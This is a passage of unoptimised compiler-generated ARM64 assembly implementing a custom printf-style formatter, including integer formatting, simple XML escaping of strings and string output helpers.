ldur w8, [x29, #-44]
orr w8, w8, #0x20
stur w8, [x29, #-44]
b LBB3_17
LBB3_16: ; in Loop: Header=BB3_1 Depth=1
b LBB3_18
LBB3_17: ; in Loop: Header=BB3_9 Depth=2
ldur w8, [x29, #-40]
add w8, w8, #1
stur w8, [x29, #-40]
b LBB3_9
LBB3_18: ; in Loop: Header=BB3_1 Depth=1
b LBB3_19
LBB3_19: ; Parent Loop BB3_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #48
cset w8, lt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB3_21
b LBB3_20
LBB3_20: ; in Loop: Header=BB3_19 Depth=2
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #57
cset w8, le
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB3_21
LBB3_21: ; in Loop: Header=BB3_19 Depth=2
ldr w8, [sp, #20] ; 4-byte Folded Reload
tbz w8, #0, LBB3_23
b LBB3_22
LBB3_22: ; in Loop: Header=BB3_19 Depth=2
ldur w8, [x29, #-48]
mov w9, #10
mul w8, w8, w9
stur w8, [x29, #-48]
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
mov x10, x9
add w10, w10, #1
stur w10, [x29, #-40]
ldrsb w8, [x8, x9]
subs w9, w8, #48
ldur w8, [x29, #-48]
add w8, w8, w9
stur w8, [x29, #-48]
b LBB3_19
LBB3_23: ; in Loop: Header=BB3_1 Depth=1
b LBB3_24
LBB3_24: ; Parent Loop BB3_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #108
cset w8, ne
tbnz w8, #0, LBB3_26
b LBB3_25
LBB3_25: ; in Loop: Header=BB3_24 Depth=2
ldur w8, [x29, #-40]
add w8, w8, #1
stur w8, [x29, #-40]
ldur w8, [x29, #-52]
add w8, w8, #1
stur w8, [x29, #-52]
b LBB3_24
LBB3_26: ; in Loop: Header=BB3_1 Depth=1
ldur w9, [x29, #-52]
mov w8, #0
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB3_28
b LBB3_27
LBB3_27: ; in Loop: Header=BB3_1 Depth=1
sturb wzr, [x29, #-53]
b LBB3_32
LBB3_28: ; in Loop: Header=BB3_1 Depth=1
ldur w9, [x29, #-52]
mov w8, #1
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB3_30
b LBB3_29
LBB3_29: ; in Loop: Header=BB3_1 Depth=1
mov w8, #1
sturb w8, [x29, #-53]
b LBB3_31
LBB3_30: ; in Loop: Header=BB3_1 Depth=1
mov w8, #1
sturb w8, [x29, #-53]
b LBB3_31
LBB3_31: ; in Loop: Header=BB3_1 Depth=1
b LBB3_32
LBB3_32: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #83
; kill: def $x8 killed $w8
str x8, [sp, #8] ; 8-byte Folded Spill
subs x8, x8, #37
cset w8, hi
tbnz w8, #0, LBB3_64
; %bb.33: ; in Loop: Header=BB3_1 Depth=1
ldr x11, [sp, #8] ; 8-byte Folded Reload
adrp x10, lJTI3_1@PAGE
add x10, x10, lJTI3_1@PAGEOFF
Ltmp1:
adr x8, Ltmp1
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB3_34: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-44]
ands w8, w8, #0x20
cset w8, eq
tbnz w8, #0, LBB3_36
b LBB3_35
LBB3_35: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-36]
add w8, w8, #2
stur w8, [x29, #-36]
ldur x8, [x29, #-8]
ldur x1, [x29, #-16]
mov w0, #48
blr x8
b LBB3_36
LBB3_36: ; in Loop: Header=BB3_1 Depth=1
ldurb w8, [x29, #-53]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB3_38
b LBB3_37
LBB3_37: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldur w2, [x29, #-44]
ldur w4, [x29, #-48]
ldur x9, [x29, #-32]
ldr x8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
stur x8, [x29, #-64]
ldur x6, [x29, #-64]
mov w3, #8
mov w5, #0
bl _myvprintf_int64
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_39
LBB3_38: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldur w2, [x29, #-44]
ldur w4, [x29, #-48]
ldur x9, [x29, #-32]
ldr w8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
stur w8, [x29, #-68]
ldur w8, [x29, #-68]
mov x6, x8
mov w3, #8
mov w5, #0
bl _myvprintf_int64
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_39
LBB3_39: ; in Loop: Header=BB3_1 Depth=1
b LBB3_65
LBB3_40: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-44]
orr w8, w8, #0x1
stur w8, [x29, #-44]
ldurb w8, [x29, #-53]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB3_42
b LBB3_41
LBB3_41: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldur w2, [x29, #-44]
ldur w4, [x29, #-48]
ldur x9, [x29, #-32]
ldr x8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
stur x8, [x29, #-80]
ldur x6, [x29, #-80]
mov w3, #10
mov w5, #0
bl _myvprintf_int64
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_43
LBB3_42: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldur w2, [x29, #-44]
ldur w4, [x29, #-48]
ldur x9, [x29, #-32]
ldr w8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
stur w8, [x29, #-84]
ldursw x6, [x29, #-84]
mov w3, #10
mov w5, #0
bl _myvprintf_int64
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_43
LBB3_43: ; in Loop: Header=BB3_1 Depth=1
b LBB3_65
LBB3_44: ; in Loop: Header=BB3_1 Depth=1
ldurb w8, [x29, #-53]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB3_46
b LBB3_45
LBB3_45: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldur w2, [x29, #-44]
ldur w4, [x29, #-48]
ldur x9, [x29, #-32]
ldr x8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
str x8, [sp, #96]
ldr x6, [sp, #96]
mov w3, #10
mov w5, #0
bl _myvprintf_int64
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_47
LBB3_46: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldur w2, [x29, #-44]
ldur w4, [x29, #-48]
ldur x9, [x29, #-32]
ldr w8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
str w8, [sp, #92]
ldr w8, [sp, #92]
mov x6, x8
mov w3, #10
mov w5, #0
bl _myvprintf_int64
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_47
LBB3_47: ; in Loop: Header=BB3_1 Depth=1
b LBB3_65
LBB3_48: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-24]
ldur w9, [x29, #-40]
add w9, w9, #1
ldrsb w8, [x8, w9, sxtw]
subs w8, w8, #83
cset w8, ne
tbnz w8, #0, LBB3_52
b LBB3_49
LBB3_49: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-40]
add w8, w8, #1
stur w8, [x29, #-40]
ldur x9, [x29, #-32]
ldr x8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
str x8, [sp, #72]
ldr x8, [sp, #72]
str x8, [sp, #80]
ldr x8, [sp, #80]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB3_51
b LBB3_50
LBB3_50: ; in Loop: Header=BB3_1 Depth=1
adrp x8, l_.str@PAGE
add x8, x8, l_.str@PAGEOFF
str x8, [sp, #80]
b LBB3_51
LBB3_51: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldr x2, [sp, #80]
bl _myvprintf_str_XML_simplistic
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_53
LBB3_52: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-36]
add w8, w8, #2
stur w8, [x29, #-36]
ldur x8, [x29, #-8]
ldur x1, [x29, #-16]
mov w0, #48
blr x8
ldur x8, [x29, #-8]
ldur x1, [x29, #-16]
mov w0, #120
blr x8
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldur w2, [x29, #-44]
ldur w4, [x29, #-48]
ldur x9, [x29, #-32]
ldr x8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
str x8, [sp, #64]
ldr x6, [sp, #64]
mov w3, #16
mov w5, #1
bl _myvprintf_int64
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_53
LBB3_53: ; in Loop: Header=BB3_1 Depth=1
b LBB3_65
LBB3_54: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #88
cset w8, eq
and w0, w8, #0x1
bl _toBool
sturb w0, [x29, #-54]
ldur w8, [x29, #-44]
ands w8, w8, #0x20
cset w8, eq
tbnz w8, #0, LBB3_56
b LBB3_55
LBB3_55: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-36]
add w8, w8, #2
stur w8, [x29, #-36]
ldur x8, [x29, #-8]
ldur x1, [x29, #-16]
mov w0, #48
blr x8
ldur x8, [x29, #-8]
ldur x1, [x29, #-16]
mov w0, #120
blr x8
b LBB3_56
LBB3_56: ; in Loop: Header=BB3_1 Depth=1
ldurb w8, [x29, #-53]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB3_58
b LBB3_57
LBB3_57: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldur w2, [x29, #-44]
ldur w4, [x29, #-48]
ldurb w5, [x29, #-54]
ldur x9, [x29, #-32]
ldr x8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
str x8, [sp, #56]
ldr x6, [sp, #56]
mov w3, #16
bl _myvprintf_int64
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_59
LBB3_58: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldur w2, [x29, #-44]
ldur w4, [x29, #-48]
ldurb w5, [x29, #-54]
ldur x9, [x29, #-32]
ldr w8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
str w8, [sp, #52]
ldr w8, [sp, #52]
mov x6, x8
mov w3, #16
bl _myvprintf_int64
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_59
LBB3_59: ; in Loop: Header=BB3_1 Depth=1
b LBB3_65
LBB3_60: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-36]
add w8, w8, #1
stur w8, [x29, #-36]
ldur x8, [x29, #-8]
ldur x10, [x29, #-32]
ldr w9, [x10]
add x10, x10, #8
stur x10, [x29, #-32]
str w9, [sp, #48]
ldr w9, [sp, #48]
ldur x1, [x29, #-16]
sxtb w0, w9
blr x8
b LBB3_65
LBB3_61: ; in Loop: Header=BB3_1 Depth=1
ldur x9, [x29, #-32]
ldr x8, [x9]
add x9, x9, #8
stur x9, [x29, #-32]
str x8, [sp, #32]
ldr x8, [sp, #32]
str x8, [sp, #40]
ldr x8, [sp, #40]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB3_63
b LBB3_62
LBB3_62: ; in Loop: Header=BB3_1 Depth=1
adrp x8, l_.str@PAGE
add x8, x8, l_.str@PAGEOFF
str x8, [sp, #40]
b LBB3_63
LBB3_63: ; in Loop: Header=BB3_1 Depth=1
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
ldur w2, [x29, #-44]
ldur w3, [x29, #-48]
ldr x4, [sp, #40]
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #83
cset w8, eq
and w8, w8, #0x1
and w5, w8, #0xff
bl _myvprintf_str
ldur w8, [x29, #-36]
add w8, w8, w0
stur w8, [x29, #-36]
b LBB3_65
LBB3_64: ; in Loop: Header=BB3_1 Depth=1
b LBB3_65
LBB3_65: ; in Loop: Header=BB3_1 Depth=1
b LBB3_66
LBB3_66: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-40]
add w8, w8, #1
stur w8, [x29, #-40]
b LBB3_1
LBB3_67:
ldur w0, [x29, #-36]
ldp x29, x30, [sp, #192] ; 16-byte Folded Reload
add sp, sp, #208
ret
.cfi_endproc
.p2align 2
lJTI3_0:
.long LBB3_15-Ltmp0
.long LBB3_16-Ltmp0
.long LBB3_16-Ltmp0
.long LBB3_16-Ltmp0
.long LBB3_12-Ltmp0
.long LBB3_11-Ltmp0
.long LBB3_16-Ltmp0
.long LBB3_16-Ltmp0
.long LBB3_16-Ltmp0
.long LBB3_12-Ltmp0
.long LBB3_13-Ltmp0
.long LBB3_16-Ltmp0
.long LBB3_16-Ltmp0
.long LBB3_14-Ltmp0
.p2align 2
lJTI3_1:
.long LBB3_61-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_54-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_60-Ltmp1
.long LBB3_40-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_34-Ltmp1
.long LBB3_48-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_61-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_44-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_64-Ltmp1
.long LBB3_54-Ltmp1
; -- End function
.p2align 2 ; -- Begin function myvprintf_int64
_myvprintf_int64: ; @myvprintf_int64
.cfi_startproc
; %bb.0:
sub sp, sp, #144
.cfi_def_cfa_offset 144
stp x29, x30, [sp, #128] ; 16-byte Folded Spill
add x29, sp, #128
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str x0, [sp, #64]
str x1, [sp, #56]
str w2, [sp, #52]
str w3, [sp, #48]
str w4, [sp, #44]
strb w5, [sp, #43]
str x6, [sp, #32]
str wzr, [sp, #28]
str wzr, [sp, #20]
strb wzr, [sp, #19]
ldrb w8, [sp, #43]
subs w8, w8, #0
cset w8, ne
and w10, w8, #0x1
adrp x9, l_.str.14@PAGE
add x9, x9, l_.str.14@PAGEOFF
adrp x8, l_.str.13@PAGE
add x8, x8, l_.str.13@PAGEOFF
ands w10, w10, #0x1
csel x8, x8, x9, ne
str x8, [sp, #8]
str wzr, [sp, #4]
ldr w8, [sp, #48]
subs w8, w8, #2
cset w8, lt
tbnz w8, #0, LBB4_2
b LBB4_1
LBB4_1:
ldr w8, [sp, #48]
subs w8, w8, #16
cset w8, le
tbnz w8, #0, LBB4_3
b LBB4_2
LBB4_2:
ldr w8, [sp, #4]
stur w8, [x29, #-52]
b LBB4_40
LBB4_3:
ldr w8, [sp, #52]
ands w8, w8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_6
b LBB4_4
LBB4_4:
ldr x8, [sp, #32]
subs x8, x8, #0
cset w8, ge
tbnz w8, #0, LBB4_6
b LBB4_5
LBB4_5:
ldr x9, [sp, #32]
mov x8, #0
subs x8, x8, x9
str x8, [sp, #32]
mov w8, #1
strb w8, [sp, #19]
b LBB4_6
LBB4_6:
ldr x8, [sp, #32]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_8
b LBB4_7
LBB4_7:
ldrsw x9, [sp, #28]
mov x8, x9
add w8, w8, #1
str w8, [sp, #28]
sub x8, x29, #48
add x9, x8, x9
mov w8, #48
strb w8, [x9]
b LBB4_17
LBB4_8:
b LBB4_9
LBB4_9: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #32]
subs x8, x8, #0
cset w8, ls
tbnz w8, #0, LBB4_16
b LBB4_10
LBB4_10: ; in Loop: Header=BB4_9 Depth=1
ldr w8, [sp, #52]
ands w8, w8, #0x10
cset w8, eq
tbnz w8, #0, LBB4_15
b LBB4_11
LBB4_11: ; in Loop: Header=BB4_9 Depth=1
ldr w9, [sp, #48]
mov w8, #10
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB4_15
b LBB4_12
LBB4_12: ; in Loop: Header=BB4_9 Depth=1
ldr w8, [sp, #28]
ldr w9, [sp, #20]
subs w8, w8, w9
mov w10, #3
sdiv w9, w8, w10
mul w9, w9, w10
subs w9, w8, w9
mov w8, #0
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB4_15
b LBB4_13
LBB4_13: ; in Loop: Header=BB4_9 Depth=1
ldr w9, [sp, #28]
mov w8, #0
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB4_15
b LBB4_14
LBB4_14: ; in Loop: Header=BB4_9 Depth=1
ldrsw x9, [sp, #28]
mov x8, x9
add w8, w8, #1
str w8, [sp, #28]
sub x8, x29, #48
add x9, x8, x9
mov w8, #44
strb w8, [x9]
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB4_15
LBB4_15: ; in Loop: Header=BB4_9 Depth=1
ldr x8, [sp, #8]
ldr x9, [sp, #32]
ldrsw x11, [sp, #48]
udiv x10, x9, x11
mul x10, x10, x11
subs x9, x9, x10
add x8, x8, x9
ldrb w8, [x8]
ldrsw x10, [sp, #28]
mov x9, x10
add w9, w9, #1
str w9, [sp, #28]
sub x9, x29, #48
add x9, x9, x10
strb w8, [x9]
ldrsw x9, [sp, #48]
ldr x8, [sp, #32]
udiv x8, x8, x9
str x8, [sp, #32]
b LBB4_9
LBB4_16:
b LBB4_17
LBB4_17:
ldrb w8, [sp, #19]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB4_19
b LBB4_18
LBB4_18:
ldrsw x9, [sp, #28]
mov x8, x9
add w8, w8, #1
str w8, [sp, #28]
sub x8, x29, #48
add x9, x8, x9
mov w8, #45
strb w8, [x9]
b LBB4_19
LBB4_19:
ldr w8, [sp, #44]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB4_28
b LBB4_20
LBB4_20:
ldr w8, [sp, #52]
ands w8, w8, #0x4
cset w8, ne
tbnz w8, #0, LBB4_28
b LBB4_21
LBB4_21:
b LBB4_22
LBB4_22: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #28]
ldr w9, [sp, #44]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB4_27
b LBB4_23
LBB4_23: ; in Loop: Header=BB4_22 Depth=1
ldr w8, [sp, #28]
subs w8, w8, #39
cset w8, le
tbnz w8, #0, LBB4_25
b LBB4_24
LBB4_24:
sturb wzr, [x29, #-9]
b LBB4_27
LBB4_25: ; in Loop: Header=BB4_22 Depth=1
ldr w8, [sp, #52]
ands w8, w8, #0x2
cset w8, ne
and w10, w8, #0x1
mov w9, #32
mov w8, #48
ands w10, w10, #0x1
csel w8, w8, w9, ne
ldrsw x10, [sp, #28]
sub x9, x29, #48
strb w8, [x9, x10]
b LBB4_26
LBB4_26: ; in Loop: Header=BB4_22 Depth=1
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB4_22
LBB4_27:
b LBB4_28
LBB4_28:
ldr w9, [sp, #28]
ldr w8, [sp, #4]
add w8, w8, w9
str w8, [sp, #4]
ldr w8, [sp, #28]
subs w8, w8, #1
str w8, [sp, #24]
b LBB4_29
LBB4_29: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #24]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB4_32
b LBB4_30
LBB4_30: ; in Loop: Header=BB4_29 Depth=1
ldr x8, [sp, #64]
ldrsw x10, [sp, #24]
sub x9, x29, #48
ldrsb w0, [x9, x10]
ldr x1, [sp, #56]
blr x8
b LBB4_31
LBB4_31: ; in Loop: Header=BB4_29 Depth=1
ldr w8, [sp, #24]
subs w8, w8, #1
str w8, [sp, #24]
b LBB4_29
LBB4_32:
ldr w8, [sp, #44]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB4_39
b LBB4_33
LBB4_33:
ldr w8, [sp, #52]
ands w8, w8, #0x4
cset w8, eq
tbnz w8, #0, LBB4_39
b LBB4_34
LBB4_34:
b LBB4_35
LBB4_35: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #28]
ldr w9, [sp, #44]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB4_38
b LBB4_36
LBB4_36: ; in Loop: Header=BB4_35 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
ldr x8, [sp, #64]
ldr x1, [sp, #56]
mov w0, #32
blr x8
b LBB4_37
LBB4_37: ; in Loop: Header=BB4_35 Depth=1
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB4_35
LBB4_38:
b LBB4_39
LBB4_39:
ldr w8, [sp, #4]
stur w8, [x29, #-52]
b LBB4_40
LBB4_40:
ldur w8, [x29, #-52]
str w8, [sp] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB4_42
b LBB4_41
LBB4_41:
bl ___stack_chk_fail
LBB4_42:
ldr w0, [sp] ; 4-byte Folded Reload
ldp x29, x30, [sp, #128] ; 16-byte Folded Reload
add sp, sp, #144
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function myvprintf_str_XML_simplistic
_myvprintf_str_XML_simplistic: ; @myvprintf_str_XML_simplistic
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur x2, [x29, #-24]
stur wzr, [x29, #-28]
ldur x0, [x29, #-24]
bl _local_strlen
str w0, [sp, #28]
str wzr, [sp, #32]
b LBB5_1
LBB5_1: ; =>This Loop Header: Depth=1
; Child Loop BB5_11 Depth 2
ldr w8, [sp, #32]
ldr w9, [sp, #28]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_17
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
ldur x8, [x29, #-24]
ldrsw x9, [sp, #32]
ldrsb w8, [x8, x9]
str w8, [sp, #12] ; 4-byte Folded Spill
subs w8, w8, #38
cset w8, eq
tbnz w8, #0, LBB5_5
b LBB5_3
LBB5_3: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
subs w8, w8, #60
cset w8, eq
tbnz w8, #0, LBB5_6
b LBB5_4
LBB5_4: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
subs w8, w8, #62
cset w8, eq
tbnz w8, #0, LBB5_7
b LBB5_8
LBB5_5: ; in Loop: Header=BB5_1 Depth=1
adrp x8, l_.str.15@PAGE
add x8, x8, l_.str.15@PAGEOFF
str x8, [sp, #16]
b LBB5_9
LBB5_6: ; in Loop: Header=BB5_1 Depth=1
adrp x8, l_.str.16@PAGE
add x8, x8, l_.str.16@PAGEOFF
str x8, [sp, #16]
b LBB5_9
LBB5_7: ; in Loop: Header=BB5_1 Depth=1
adrp x8, l_.str.17@PAGE
add x8, x8, l_.str.17@PAGEOFF
str x8, [sp, #16]
b LBB5_9
LBB5_8: ; in Loop: Header=BB5_1 Depth=1
; kill: def $x8 killed $xzr
str xzr, [sp, #16]
b LBB5_9
LBB5_9: ; in Loop: Header=BB5_1 Depth=1
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB5_14
b LBB5_10
LBB5_10: ; in Loop: Header=BB5_1 Depth=1
b LBB5_11
LBB5_11: ; Parent Loop BB5_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr x8, [sp, #16]
ldrb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB5_13
b LBB5_12
LBB5_12: ; in Loop: Header=BB5_11 Depth=2
ldur x8, [x29, #-8]
ldr x9, [sp, #16]
ldrsb w0, [x9]
ldur x1, [x29, #-16]
blr x8
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
ldr x8, [sp, #16]
add x8, x8, #1
str x8, [sp, #16]
b LBB5_11
LBB5_13: ; in Loop: Header=BB5_1 Depth=1
b LBB5_15
LBB5_14: ; in Loop: Header=BB5_1 Depth=1
ldur x8, [x29, #-8]
ldur x9, [x29, #-24]
ldrsw x10, [sp, #32]
ldrsb w0, [x9, x10]
ldur x1, [x29, #-16]
blr x8
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
b LBB5_15
LBB5_15: ; in Loop: Header=BB5_1 Depth=1
b LBB5_16
LBB5_16: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB5_1
LBB5_17:
ldur w0, [x29, #-28]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function toBool
_toBool: ; @toBool
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
ldr w8, [sp, #12]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ands w8, w8, #0x1
cset w8, eq
str w8, [sp, #8]
ldr w8, [sp, #8]
and w0, w8, #0xff
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function myvprintf_str
_myvprintf_str: ; @myvprintf_str
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-16]
stur x1, [x29, #-24]
stur w2, [x29, #-28]
stur w3, [x29, #-32]
stur x4, [x29, #-40]
sturb w5, [x29, #-41]
stur wzr, [x29, #-48]
ldur x0, [x29, #-40]
bl _local_strlen
str w0, [sp, #52]
ldur w8, [x29, #-32]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB7_9
b LBB7_1
LBB7_1:
ldr w9, [sp, #52]
ldur w8, [x29, #-48]
add w8, w8, w9
stur w8, [x29, #-48]
stur wzr, [x29, #-52]
b LBB7_2
LBB7_2: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-52]
ldr w9, [sp, #52]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_8
b LBB7_3
LBB7_3: ; in Loop: Header=BB7_2 Depth=1
ldur x8, [x29, #-16]
str x8, [sp, #40] ; 8-byte Folded Spill
ldurb w8, [x29, #-41]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_5
b LBB7_4
LBB7_4: ; in Loop: Header=BB7_2 Depth=1
ldur x8, [x29, #-40]
ldursw x9, [x29, #-52]
ldrsb w0, [x8, x9]
bl _local_toupper
sxtb w8, w0
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB7_6
LBB7_5: ; in Loop: Header=BB7_2 Depth=1
ldur x8, [x29, #-40]
ldursw x9, [x29, #-52]
ldrsb w8, [x8, x9]
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB7_6
LBB7_6: ; in Loop: Header=BB7_2 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr w9, [sp, #36] ; 4-byte Folded Reload
ldur x1, [x29, #-24]
sxtb w0, w9
blr x8
b LBB7_7
LBB7_7: ; in Loop: Header=BB7_2 Depth=1
ldur w8, [x29, #-52]
add w8, w8, #1
stur w8, [x29, #-52]
b LBB7_2
LBB7_8:
ldur w8, [x29, #-48]
stur w8, [x29, #-4]
b LBB7_38
LBB7_9:
ldr w8, [sp, #52]
ldur w9, [x29, #-32]
